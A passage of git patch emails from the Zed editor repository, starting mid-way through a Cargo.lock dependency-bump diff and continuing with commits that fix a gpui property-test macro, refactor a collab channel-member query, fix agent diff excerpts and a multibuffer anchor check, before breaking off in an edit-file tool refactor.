"rand 0.9.3", + "rand 0.9.4", "rand_distr", "rtrb", "symphonia", @@ -14977,7 +14995,7 @@ dependencies = [ "gpui", "heapless", "log", - "rand 0.9.3", + "rand 0.9.4", "rayon", "sum_tree", "tracing", @@ -15016,7 +15034,7 @@ dependencies = [ "gpui", "parking_lot", "proto", - "rand 0.9.3", + "rand 0.9.4", "rsa", "serde", "serde_json", @@ -15162,7 +15180,7 @@ dependencies = [ "borsh", "bytes 1.11.1", "num-traits", - "rand 0.8.5", + "rand 0.8.6", "rkyv", "serde", "serde_json", @@ -15232,7 +15250,7 @@ dependencies = [ "errno 0.3.14", "libc", "linux-raw-sys 0.11.0", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -15270,16 +15288,16 @@ dependencies = [ [[package]] name = "rustls" -version = "0.23.33" +version = "0.23.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "751e04a496ca00bb97a5e043158d23d66b5aabf2e1d5aa2a0aaebb1aafe6f82c" +checksum = "ef86cd5876211988985292b91c96a8f2d298df24e75989a43a3c73f2d4d8168b" dependencies = [ "aws-lc-rs", "log", "once_cell", "ring", "rustls-pki-types", - "rustls-webpki 0.103.7", + "rustls-webpki 0.103.13", "subtle", "zeroize", ] @@ -15290,7 +15308,7 @@ version = "0.6.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a9aace74cb666635c918e9c12bc0d348266037aa8eb599b5cba565709a8dff00" dependencies = [ - "openssl-probe", + "openssl-probe 0.1.6", "rustls-pemfile 1.0.4", "schannel", "security-framework 2.11.1", @@ -15298,11 +15316,11 @@ dependencies = [ [[package]] name = "rustls-native-certs" -version = "0.8.2" +version = "0.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9980d917ebb0c0536119ba501e90834767bffc3d60641457fd84a1f3fd337923" +checksum = "612460d5f7bea540c490b2b6395d8e34a953e52b491accd6c86c8164c5932a63" dependencies = [ - "openssl-probe", + "openssl-probe 0.2.1", "rustls-pki-types", "schannel", "security-framework 3.5.1", @@ -15347,10 +15365,10 @@ dependencies = [ "jni", "log", "once_cell", - "rustls 0.23.33", - 
"rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-platform-verifier-android", - "rustls-webpki 0.103.7", + "rustls-webpki 0.103.13", "security-framework 3.5.1", "security-framework-sys", "webpki-root-certs", @@ -15375,9 +15393,9 @@ dependencies = [ [[package]] name = "rustls-webpki" -version = "0.103.7" +version = "0.103.13" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10b3f4191e8a80e6b43eebabfac91e5dcecebb27a71f04e820c47ec41d314bf" +checksum = "61c429a8649f110dddef65e2a5ad240f747e85f7758a6bccc7e5777bd33f756e" dependencies = [ "aws-lc-rs", "ring", @@ -15423,9 +15441,9 @@ dependencies = [ [[package]] name = "ryu" -version = "1.0.20" +version = "1.0.23" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28d3b2b1366ec20994f1fd18c3c594f05c5dd4bc44d8bb0c1c632c8d6829481f" +checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f" [[package]] name = "saa" @@ -15481,7 +15499,7 @@ dependencies = [ "flume", "futures 0.3.32", "parking_lot", - "rand 0.9.3", + "rand 0.9.4", "web-time", ] @@ -16591,12 +16609,12 @@ dependencies = [ [[package]] name = "socket2" -version = "0.6.1" +version = "0.6.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "17129e116933cf371d018bb80ae557e889637989d8638274fb25622827b03881" +checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e" dependencies = [ "libc", - "windows-sys 0.60.2", + "windows-sys 0.61.2", ] [[package]] @@ -16731,7 +16749,7 @@ dependencies = [ "once_cell", "percent-encoding", "rust_decimal", - "rustls 0.23.33", + "rustls 0.23.40", "serde", "serde_json", "sha2", @@ -16815,7 +16833,7 @@ dependencies = [ "memchr", "once_cell", "percent-encoding", - "rand 0.8.5", + "rand 0.8.6", "rsa", "rust_decimal", "serde", @@ -16859,7 +16877,7 @@ dependencies = [ "memchr", "num-bigint", "once_cell", - "rand 0.8.5", + "rand 0.8.6", "rust_decimal", "serde", "serde_json", @@ -16958,7 
+16976,7 @@ name = "streaming_diff" version = "0.1.0" dependencies = [ "ordered-float 2.10.1", - "rand 0.9.3", + "rand 0.9.4", "rope", "util", ] @@ -17082,7 +17100,7 @@ dependencies = [ "heapless", "log", "proptest", - "rand 0.9.3", + "rand 0.9.4", "rayon", "tracing", "zlog", @@ -17720,7 +17738,7 @@ dependencies = [ "getrandom 0.3.4", "once_cell", "rustix 1.1.2", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -17759,7 +17777,7 @@ dependencies = [ "log", "parking_lot", "percent-encoding", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "schemars 1.0.4", @@ -17842,7 +17860,7 @@ dependencies = [ "log", "parking_lot", "postage", - "rand 0.9.3", + "rand 0.9.4", "regex", "rope", "smallvec", @@ -18179,17 +18197,17 @@ dependencies = [ [[package]] name = "tokio" -version = "1.48.0" +version = "1.52.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff360e02eab121e0bc37a2d3b4d4dc622e6eda3a8e5253d5435ecf5bd4c68408" +checksum = "b67dee974fe86fd92cc45b7a95fdd2f99a36a6d7b0d431a231178d3d670bbcc6" dependencies = [ "bytes 1.11.1", "libc", - "mio 1.1.0", + "mio 1.2.0", "parking_lot", "pin-project-lite", "signal-hook-registry", - "socket2 0.6.1", + "socket2 0.6.3", "tokio-macros", "windows-sys 0.61.2", ] @@ -18207,9 +18225,9 @@ dependencies = [ [[package]] name = "tokio-macros" -version = "2.6.0" +version = "2.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "af407857209536a95c8e56f8231ef2c2e2aff839b22e07a1ffcbc617e9db9fa5" +checksum = "385a6cb71ab9ab790c5fe8d67f1645e6c450a7ce006a33de03daa956cf70a496" dependencies = [ "proc-macro2", "quote", @@ -18238,11 +18256,11 @@ dependencies = [ [[package]] name = "tokio-rustls" -version = "0.26.2" +version = "0.26.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8e727b36a1a0e8b74c376ac2211e40c2c8af09fb4013c60d910495810f008e9b" +checksum = "1729aa945f29d91ba541258c8df89027d5792d85a8841fb65e8bf0f4ede4ef61" dependencies = [ 
- "rustls 0.23.33", + "rustls 0.23.40", "tokio", ] @@ -18302,19 +18320,19 @@ checksum = "d25a406cddcc431a75d3d9afc6a7c0f7428d4891dd973e4d54c56b46127bf857" dependencies = [ "futures-util", "log", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tungstenite 0.28.0", ] [[package]] name = "tokio-util" -version = "0.7.16" +version = "0.7.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "14307c986784f72ef81c89db7d9e28d6ac26d16213b109ea501696195e6e3ce5" +checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098" dependencies = [ "bytes 1.11.1", "futures-core", @@ -18945,7 +18963,7 @@ dependencies = [ "http 0.2.12", "httparse", "log", - "rand 0.8.5", + "rand 0.8.6", "sha1", "thiserror 1.0.69", "url", @@ -18964,7 +18982,7 @@ dependencies = [ "http 1.3.1", "httparse", "log", - "rand 0.8.5", + "rand 0.8.6", "sha1", "thiserror 1.0.69", "url", @@ -18982,8 +19000,8 @@ dependencies = [ "http 1.3.1", "httparse", "log", - "rand 0.9.3", - "rustls 0.23.33", + "rand 0.9.4", + "rustls 0.23.40", "rustls-pki-types", "sha1", "thiserror 2.0.17", @@ -19001,8 +19019,8 @@ dependencies = [ "http 1.3.1", "httparse", "log", - "rand 0.9.3", - "rustls 0.23.33", + "rand 0.9.4", + "rustls 0.23.40", "rustls-pki-types", "sha1", "thiserror 2.0.17", @@ -19340,7 +19358,7 @@ dependencies = [ "nix 0.29.0", "percent-encoding", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "regex", "rust-embed", "schemars 1.0.4", @@ -20740,7 +20758,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.61.2", + "windows-sys 0.48.0", ] [[package]] @@ -21966,7 +21984,7 @@ dependencies = [ "paths", "postage", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "rpc", "serde", "serde_json", @@ 
-22221,11 +22239,11 @@ dependencies = [ "js-sys", "nom 8.0.0", "pin-project", - "rand 0.8.5", + "rand 0.8.6", "sha1", "thiserror 1.0.69", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-util", "url", "wasm-bindgen", @@ -22572,7 +22590,7 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-util", "ipnet", "js-sys", @@ -22583,8 +22601,8 @@ dependencies = [ "percent-encoding", "pin-project-lite", "quinn", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pemfile 2.2.0", "rustls-pki-types", "serde", @@ -22593,7 +22611,7 @@ dependencies = [ "sync_wrapper 1.0.2", "system-configuration 0.6.1", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-socks", "tokio-util", "tower 0.5.2", @@ -22616,7 +22634,7 @@ dependencies = [ "core-graphics-helmer-fork", "log", "objc", - "rand 0.8.5", + "rand 0.8.6", "screencapturekit", "screencapturekit-sys", "sysinfo 0.31.4", @@ -22815,7 +22833,7 @@ dependencies = [ "num-traits", "once_cell", "parking_lot", - "rand 0.9.3", + "rand 0.9.4", "regex", "scc", "thiserror 1.0.69", From e10f0f11fc9eb97ca550872a81fcc9736a4dee36 Mon Sep 17 00:00:00 2001 From: Cameron Mcloughlin Date: Mon, 4 May 2026 12:43:06 +0100 Subject: [PATCH 161/231] gpui: Preserve test return type in gpui::property_test macro (#55622) Proptest allows returning `Result<(), TestCaseError>` , but we were swallowing return values, causing spurious test successes if using `prop_assume!`, `prop_assert!`, etc. These would have given an "unused `Result`" warning. Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/gpui_macros/src/property_test.rs | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/crates/gpui_macros/src/property_test.rs b/crates/gpui_macros/src/property_test.rs index 2c7ed0ee0dc138..fe1585cc0672a1 100644 --- a/crates/gpui_macros/src/property_test.rs +++ b/crates/gpui_macros/src/property_test.rs @@ -23,6 +23,7 @@ pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { }; let test_name = func.sig.ident.clone(); + let test_ret_ty = func.sig.output.clone(); let inner_fn_name = format_ident!("__{test_name}"); let outer_fn_attributes = &func.attrs; @@ -50,14 +51,16 @@ pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { let run_test_body = match &asyncness { None => quote! { #cx_vars - #inner_fn_name(#inner_args); + let result = #inner_fn_name(#inner_args); #cx_teardowns + result }, Some(_) => quote! { let foreground_executor = gpui::ForegroundExecutor::new(std::sync::Arc::new(dispatcher.clone())); #cx_vars - foreground_executor.block_test(#inner_fn_name(#inner_args)); + let result = foreground_executor.block_test(#inner_fn_name(#inner_args)); #cx_teardowns + result }, }; @@ -68,12 +71,12 @@ pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { #fixed_macro_invocation #(#outer_fn_attributes)* - fn #test_name(#proptest_args) { + fn #test_name(#proptest_args) #test_ret_ty { #inner_fn ::gpui::run_test_once( __seed, - Box::new(move |dispatcher| { + Box::new(move |dispatcher| #test_ret_ty { #run_test_body }), ) From 8325c918bf12a8275cf656d412ba5d2a6b8f721b Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Mon, 4 May 2026 13:51:56 +0200 Subject: [PATCH 162/231] collab: Stop mixing concerns in `get_channel_participant_details` (#55568) This PR updates the `get_channel_participant_details` method to reduce the mixing of concerns within the method. 
The authorization check for the caller has been moved to the outside, along with the conversions from the database representations to the RPC proto representations. Now the method is just responsible for dealing with the data fetching, which will make it easier to swap out. Release Notes: - N/A --- crates/collab/src/db/queries/channels.rs | 33 ++----- crates/collab/src/db/tables/channel_member.rs | 16 ++++ crates/collab/src/db/tables/user.rs | 15 ++++ crates/collab/src/rpc.rs | 11 ++- .../integration/db_tests/channel_tests.rs | 87 +++++++++++-------- 5 files changed, 100 insertions(+), 62 deletions(-) diff --git a/crates/collab/src/db/queries/channels.rs b/crates/collab/src/db/queries/channels.rs index 7262a5fa40ff7b..7b435ba1aa2bff 100644 --- a/crates/collab/src/db/queries/channels.rs +++ b/crates/collab/src/db/queries/channels.rs @@ -2,7 +2,7 @@ use super::*; use anyhow::Context as _; use rpc::{ ErrorCode, ErrorCodeExt, - proto::{ChannelBufferVersion, VectorClockEntry, channel_member::Kind}, + proto::{ChannelBufferVersion, VectorClockEntry}, }; use sea_orm::{ActiveValue, DbBackend, TryGetableMany}; @@ -687,16 +687,12 @@ impl Database { /// Returns the details for the specified channel member. 
pub async fn get_channel_participant_details( &self, - channel_id: ChannelId, + channel: &Channel, filter: &str, limit: u64, - user_id: UserId, - ) -> Result<(Vec, Vec)> { + ) -> Result<(Vec, Vec)> { let members = self .transaction(move |tx| async move { - let channel = self.get_channel_internal(channel_id, &tx).await?; - self.check_user_is_channel_participant(&channel, user_id, &tx) - .await?; let mut query = channel_member::Entity::find() .find_also_related(user::Entity) .filter(channel_member::Column::ChannelId.eq(channel.root_id())); @@ -726,32 +722,15 @@ impl Database { }) .await?; - let mut users: Vec = Vec::with_capacity(members.len()); + let mut users: Vec = Vec::with_capacity(members.len()); let members = members .into_iter() .map(|(member, user)| { if let Some(user) = user { - users.push(proto::User { - id: user.id.to_proto(), - avatar_url: format!( - "https://avatars.githubusercontent.com/u/{}?s=128&v=4", - user.github_user_id - ), - github_login: user.github_login, - name: user.name, - }) - } - proto::ChannelMember { - role: member.role.into(), - user_id: member.user_id.to_proto(), - kind: if member.accepted { - Kind::Member - } else { - Kind::Invitee - } - .into(), + users.push(user) } + member }) .collect(); diff --git a/crates/collab/src/db/tables/channel_member.rs b/crates/collab/src/db/tables/channel_member.rs index a00a380d55941c..7116b92ab63c28 100644 --- a/crates/collab/src/db/tables/channel_member.rs +++ b/crates/collab/src/db/tables/channel_member.rs @@ -1,4 +1,5 @@ use crate::db::{ChannelId, ChannelMemberId, ChannelRole, UserId, channel_member}; +use rpc::proto; use sea_orm::entity::prelude::*; #[derive(Clone, Debug, PartialEq, Eq, DeriveEntityModel)] @@ -12,6 +13,21 @@ pub struct Model { pub role: ChannelRole, } +impl From for proto::ChannelMember { + fn from(member: Model) -> Self { + Self { + role: member.role.into(), + user_id: member.user_id.to_proto(), + kind: if member.accepted { + proto::channel_member::Kind::Member + } else { + 
proto::channel_member::Kind::Invitee + } + .into(), + } + } +} + impl ActiveModelBehavior for ActiveModel {} #[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)] diff --git a/crates/collab/src/db/tables/user.rs b/crates/collab/src/db/tables/user.rs index 68044bc4429937..933e78ed426984 100644 --- a/crates/collab/src/db/tables/user.rs +++ b/crates/collab/src/db/tables/user.rs @@ -1,5 +1,6 @@ use crate::db::UserId; use chrono::NaiveDateTime; +use rpc::proto; use sea_orm::entity::prelude::*; use serde::Serialize; @@ -30,6 +31,20 @@ impl From for crate::entities::User { } } +impl From for proto::User { + fn from(user: Model) -> Self { + Self { + id: user.id.to_proto(), + avatar_url: format!( + "https://avatars.githubusercontent.com/u/{}?s=128&v=4", + user.github_user_id + ), + github_login: user.github_login, + name: user.name, + } + } +} + #[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)] pub enum Relation { #[sea_orm(has_one = "super::room_participant::Entity")] diff --git a/crates/collab/src/rpc.rs b/crates/collab/src/rpc.rs index 4c38887b5412dd..39f442bcafd9d8 100644 --- a/crates/collab/src/rpc.rs +++ b/crates/collab/src/rpc.rs @@ -3160,9 +3160,18 @@ async fn get_channel_members( } else { request.limit }; + + let channel = db.get_channel(channel_id, session.user_id()).await?; + let (members, users) = db - .get_channel_participant_details(channel_id, &request.query, limit, session.user_id()) + .get_channel_participant_details(&channel, &request.query, limit) .await?; + let members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect(); + let users = users.into_iter().map(proto::User::from).collect(); + response.send(proto::GetChannelMembersResponse { members, users })?; Ok(()) } diff --git a/crates/collab/tests/integration/db_tests/channel_tests.rs b/crates/collab/tests/integration/db_tests/channel_tests.rs index c78fe0f4ef71f7..473225fc762713 100644 --- a/crates/collab/tests/integration/db_tests/channel_tests.rs +++ 
b/crates/collab/tests/integration/db_tests/channel_tests.rs @@ -1,6 +1,6 @@ use super::{assert_channel_tree_matches, channel_tree, new_test_user}; use crate::test_both_dbs; -use collab::db::{Channel, ChannelId, ChannelRole, Database, NewUserParams, RoomId, UserId}; +use collab::db::{Channel, ChannelId, ChannelRole, Database, NewUserParams, RoomId}; use rpc::{ ConnectionId, proto::{self, reorder_channel}, @@ -36,14 +36,12 @@ async fn test_channels(db: &Arc) { .await .unwrap(); + let replace_channel = db.get_channel(replace_id, a_id).await.unwrap(); let (members, _) = db - .get_channel_participant_details(replace_id, "", 10, a_id) + .get_channel_participant_details(&replace_channel, "", 10) .await .unwrap(); - let ids = members - .into_iter() - .map(|m| UserId::from_proto(m.user_id)) - .collect::>(); + let ids = members.into_iter().map(|m| m.user_id).collect::>(); assert_eq!(ids, &[a_id, b_id]); let rust_id = db.create_root_channel("rust", a_id).await.unwrap(); @@ -158,17 +156,17 @@ async fn test_channel_invites(db: &Arc) { let user_2 = new_test_user(db, "user2@example.com").await; let user_3 = new_test_user(db, "user3@example.com").await; - let channel_1_1 = db.create_root_channel("channel_1", user_1).await.unwrap(); + let channel_1_1_id = db.create_root_channel("channel_1", user_1).await.unwrap(); let channel_1_2 = db.create_root_channel("channel_2", user_1).await.unwrap(); - db.invite_channel_member(channel_1_1, user_2, user_1, ChannelRole::Member) + db.invite_channel_member(channel_1_1_id, user_2, user_1, ChannelRole::Member) .await .unwrap(); db.invite_channel_member(channel_1_2, user_2, user_1, ChannelRole::Member) .await .unwrap(); - db.invite_channel_member(channel_1_1, user_3, user_1, ChannelRole::Admin) + db.invite_channel_member(channel_1_1_id, user_3, user_1, ChannelRole::Admin) .await .unwrap(); @@ -180,7 +178,7 @@ async fn test_channel_invites(db: &Arc) { .into_iter() .map(|channel| channel.id) .collect::>(); - assert_eq!(user_2_invites, &[channel_1_1, 
channel_1_2]); + assert_eq!(user_2_invites, &[channel_1_1_id, channel_1_2]); let user_3_invites = db .get_channels_for_user(user_3) @@ -190,13 +188,17 @@ async fn test_channel_invites(db: &Arc) { .into_iter() .map(|channel| channel.id) .collect::>(); - assert_eq!(user_3_invites, &[channel_1_1]); + assert_eq!(user_3_invites, &[channel_1_1_id]); - let (mut members, _) = db - .get_channel_participant_details(channel_1_1, "", 100, user_1) + let channel_1_1 = db.get_channel(channel_1_1_id, user_1).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&channel_1_1, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); assert_eq!( members, @@ -219,19 +221,24 @@ async fn test_channel_invites(db: &Arc) { ] ); - db.respond_to_channel_invite(channel_1_1, user_2, true) + db.respond_to_channel_invite(channel_1_1_id, user_2, true) .await .unwrap(); - let channel_1_3 = db - .create_sub_channel("channel_3", channel_1_1, user_1) + let channel_1_3_id = db + .create_sub_channel("channel_3", channel_1_1_id, user_1) .await .unwrap(); + let channel_1_3 = db.get_channel(channel_1_3_id, user_1).await.unwrap(); let (members, _) = db - .get_channel_participant_details(channel_1_3, "", 100, user_1) + .get_channel_participant_details(&channel_1_3, "", 100) .await .unwrap(); + let members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); assert_eq!( members, &[ @@ -727,13 +734,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .await .unwrap(); - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); 
members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ @@ -803,13 +813,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .is_err() ); - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ @@ -840,13 +853,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .unwrap(); // currently people invited to parent channels are not shown here - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ @@ -910,13 +926,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .await .unwrap(); - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ From 4071f0d7ba26563b211ab5a2fef96970493295e1 Mon Sep 17 00:00:00 2001 From: Cole Miller Date: Mon, 4 May 2026 07:56:06 -0400 Subject: [PATCH 163/231] Fix mismatched excerpts in split agent diff (#55629) Self-Review Checklist: - [x] I've 
reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed excerpts not matching in the agent diff when in the split view. --- crates/agent_ui/src/agent_diff.rs | 28 +++++++++++++--------------- crates/editor/src/split.rs | 12 ++++++++++++ 2 files changed, 25 insertions(+), 15 deletions(-) diff --git a/crates/agent_ui/src/agent_diff.rs b/crates/agent_ui/src/agent_diff.rs index 04951fcbe7c8f2..4a5771fd9810fe 100644 --- a/crates/agent_ui/src/agent_diff.rs +++ b/crates/agent_ui/src/agent_diff.rs @@ -173,19 +173,17 @@ impl AgentDiffPane { .map(|diff_hunk| diff_hunk.buffer_range.to_point(&snapshot)) .collect::>(); - let (was_empty, is_excerpt_newly_added) = - self.multibuffer.update(cx, |multibuffer, cx| { - let was_empty = multibuffer.is_empty(); - let is_excerpt_newly_added = multibuffer.update_excerpts_for_path( - path_key.clone(), - buffer.clone(), - diff_hunk_ranges, - multibuffer_context_lines(cx), - cx, - ); - multibuffer.add_diff(diff_handle.clone(), cx); - (was_empty, is_excerpt_newly_added) - }); + let was_empty = self.multibuffer.read(cx).is_empty(); + let is_excerpt_newly_added = self.editor.update(cx, |editor, cx| { + editor.update_excerpts_for_path( + path_key.clone(), + buffer.clone(), + diff_hunk_ranges, + multibuffer_context_lines(cx), + diff_handle.clone(), + cx, + ) + }); let rhs_editor = self.editor.read(cx).rhs_editor().clone(); rhs_editor.update(cx, |editor, cx| { @@ -216,9 +214,9 @@ impl AgentDiffPane { }); } - self.multibuffer.update(cx, |multibuffer, cx| { + self.editor.update(cx, |editor, cx| { for buffer_id in buffers_to_delete { - multibuffer.remove_excerpts_for_buffer(buffer_id, cx); + 
editor.remove_excerpts_for_buffer(buffer_id, cx); } }); diff --git a/crates/editor/src/split.rs b/crates/editor/src/split.rs index 42f485a236b40c..8f7ef224c53388 100644 --- a/crates/editor/src/split.rs +++ b/crates/editor/src/split.rs @@ -1280,6 +1280,18 @@ impl SplittableEditor { } } } + + pub fn remove_excerpts_for_buffer( + &mut self, + buffer_id: BufferId, + cx: &mut Context<'_, SplittableEditor>, + ) { + let snapshot = self.rhs_multibuffer.read(cx).snapshot(cx); + let Some(path) = snapshot.path_for_buffer(buffer_id) else { + return; + }; + self.remove_excerpts_for_path(path.clone(), cx); + } } #[cfg(test)] From 35cfa71e7f2e3256487776efc9a8004e76896bb2 Mon Sep 17 00:00:00 2001 From: Cole Miller Date: Mon, 4 May 2026 08:46:03 -0400 Subject: [PATCH 164/231] Fix panic in `multi_buffer::Anchor::is_valid` (#55644) We check `is_valid` by seeking to the first excerpt that is `>=` the anchor, and comparing the anchor to the excerpt's start and end. But we were missing a check for the case where seeking puts us on an excerpt for a different buffer, for example when the anchor to be checked is past the end of the context range for its buffer's last excerpt. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed a panic in multibuffers. 
--- crates/multi_buffer/src/anchor.rs | 3 ++ crates/multi_buffer/src/multi_buffer_tests.rs | 51 +++++++++++++++++++ 2 files changed, 54 insertions(+) diff --git a/crates/multi_buffer/src/anchor.rs b/crates/multi_buffer/src/anchor.rs index 6a8e3b86af0075..849e9932c2a16e 100644 --- a/crates/multi_buffer/src/anchor.rs +++ b/crates/multi_buffer/src/anchor.rs @@ -232,6 +232,9 @@ impl ExcerptAnchor { let Some(excerpt) = cursor.item() else { return false; }; + if excerpt.buffer_id != buffer_snapshot.remote_id() { + return false; + } let is_valid = self.text_anchor == excerpt.range.context.start || self.text_anchor == excerpt.range.context.end || self.text_anchor.is_valid(&buffer_snapshot); diff --git a/crates/multi_buffer/src/multi_buffer_tests.rs b/crates/multi_buffer/src/multi_buffer_tests.rs index 2f4046b8601f8a..1538c325267094 100644 --- a/crates/multi_buffer/src/multi_buffer_tests.rs +++ b/crates/multi_buffer/src/multi_buffer_tests.rs @@ -6206,3 +6206,54 @@ fn test_resolving_max_anchor_for_buffer(cx: &mut TestAppContext) { assert_eq!(point, Point::new(10, 0)); }) } + +#[gpui::test] +fn test_is_valid_anchor_past_last_excerpt_for_buffer(cx: &mut TestAppContext) { + let buffer_a = cx.new(|cx| Buffer::local("aaa\nbbb\nccc\n", cx)); + buffer_a.update(cx, |buffer, cx| { + let len = buffer.len(); + buffer.edit([(len..len, "ddd\neee\n")], None, cx); + }); + let buffer_b = cx.new(|cx| Buffer::local("xxx\n", cx)); + for line in ["yyy\n", "zzz\n", "www\n", "vvv\n"] { + buffer_b.update(cx, |buffer, cx| { + let len = buffer.len(); + buffer.edit([(len..len, line)], None, cx); + }); + } + + let path_a = PathKey::with_sort_prefix(0, rel_path("aaa.rs").into_arc()); + let path_b = PathKey::with_sort_prefix(1, rel_path("bbb.rs").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path_a.clone(), + buffer_a.clone(), + vec![Point::new(1, 0)..Point::new(2, 3)], + 0, + 
cx, + ); + multibuffer.set_excerpts_for_path( + path_b.clone(), + buffer_b.clone(), + vec![Point::new(1, 0)..Point::new(3, 3)], + 0, + cx, + ); + }); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + + let buffer_a_snapshot = buffer_a.read(cx).snapshot(); + let anchor_past_excerpt = buffer_a_snapshot.anchor_after(Point::new(4, 0)); + let mb_anchor = snapshot.anchor_in_buffer(anchor_past_excerpt).unwrap(); + + assert!( + !mb_anchor.is_valid(&snapshot), + "anchor past the last excerpt for its buffer should not be valid" + ); + }); +} From 7d6f8c218f0781c154b9d2a22256a9e811bebde7 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 17:45:06 +0200 Subject: [PATCH 165/231] agent: Refactor edit file tool state handling (#55663) Ports some changes introduced in #51165 out to make merge conflicts easier to handle. Splits the `Pipeline` into two separate types for mode edit/write so we don't need to maintain that invariant inside the pipeline/in the parser Also moves the parser to be a submodule of `edit_file_tool` Release Notes: - N/A --- crates/agent/src/tools.rs | 1 - crates/agent/src/tools/edit_file_tool.rs | 555 ++++++++++-------- .../streaming_parser.rs} | 183 +++--- 3 files changed, 393 insertions(+), 346 deletions(-) rename crates/agent/src/tools/{tool_edit_parser.rs => edit_file_tool/streaming_parser.rs} (86%) diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index e9596d038faff2..b9db30ce432c28 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -18,7 +18,6 @@ mod restore_file_from_disk_tool; mod save_file_tool; mod spawn_agent_tool; mod terminal_tool; -mod tool_edit_parser; mod tool_permissions; mod update_plan_tool; mod web_search_tool; diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index e22436c7a80473..a51e9883224a69 100644 --- a/crates/agent/src/tools/edit_file_tool.rs 